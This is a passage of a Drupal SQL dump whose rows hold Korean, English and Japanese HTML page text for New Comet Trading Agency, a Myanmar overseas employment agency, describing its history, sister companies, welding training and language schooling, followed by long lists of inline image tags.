('page', 0, 23, 265, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.<o:p></o:p><o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 266, 'en', 0, '<p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_0.jpg\" data-align=\"center\" data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30.jpg\" data-align=\"center\" data-entity-uuid=\"891213d9-115b-4b86-8d26-3ebbbbeb98a8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-31.jpg\" data-align=\"center\" data-entity-uuid=\"95019304-f6cb-4eaa-90da-ef0d7f51ee47\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-32.jpg\" data-align=\"center\" data-entity-uuid=\"361d538d-8be6-49d8-ae4e-5ac9247fd5b9\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-33.jpg\" data-align=\"center\" data-entity-uuid=\"e46b1924-0cc4-41fc-baa4-df9dd73fbec8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-34.jpg\" data-align=\"center\" data-entity-uuid=\"809ca92e-91d6-401f-b00b-567cc35ce1c5\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-35.jpg\" data-align=\"center\" data-entity-uuid=\"667d5781-8402-43e6-853f-ec90e796e6c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-36.jpg\" data-align=\"center\" data-entity-uuid=\"58b87ffa-6876-47b0-9e6e-d43d2c7aff38\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-37.jpg\" data-align=\"center\" data-entity-uuid=\"7b3b8c38-5bbf-4e74-85eb-618ca90b2db6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-38.jpg\" data-align=\"center\" data-entity-uuid=\"d0e647b4-4413-4a58-b4cb-91c95524d97f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-39.jpg\" data-align=\"center\" data-entity-uuid=\"ad197c72-ff23-4b15-b4ad-d15c791e6a77\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-40.jpg\" data-align=\"center\" data-entity-uuid=\"894ca453-d21f-4356-ad3e-bdb7c3e12408\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 23, 266, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1-NC_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"0a8cade2-9871-451c-a978-1d09fd84f0de\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_1.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-2_0.jpg\"><img data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_0.jpg\"><img data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_0.jpg\" alt=\"\" data-align=\"center\"><p>&nbsp;</p><img data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_0.jpg\"><img data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-13_0.jpg\" alt=\"\"><img data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-14_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-15_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-16_0.jpg\"><img data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-17_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-18_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_0.jpg\" alt=\"\"><img data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-20_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"3aae8220-86a7-4232-91d1-58e14468ec77\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-30_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"031623ed-3c0b-4a1b-acd5-2d701d16ebac\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-31_0.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"ef87488d-b6fc-43b9-a474-536a45ca31b3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-32_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"b6b3f255-33bb-4aa9-bf27-91cff7be1296\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-33_0.jpg\"><img data-entity-uuid=\"19536b68-3af1-4ad0-9b3f-6a52f8d321d4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-34_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"99f5c203-f9a2-461a-8abc-2c8ba6a07f85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-35_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"a6cddcbb-87bf-46e9-b5f0-6eb2c81ee34a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-36_0.jpg\" alt=\"\"><img data-entity-uuid=\"6e3b7635-3292-469e-a404-d217c165d0c8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-37_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"96bb0f24-5735-4d44-9780-209fc82eba38\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-38_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"b0020490-36a6-4ed1-bde8-eecc0d0e0bc0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-39_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"7d4ada41-9768-43b4-83b9-469cc689b193\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_0.jpg\" data-align=\"center\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 266, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1-NC_1.jpg\"><img data-entity-uuid=\"d19e5ddf-b119-4ed3-ac45-b0803d864c96\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" 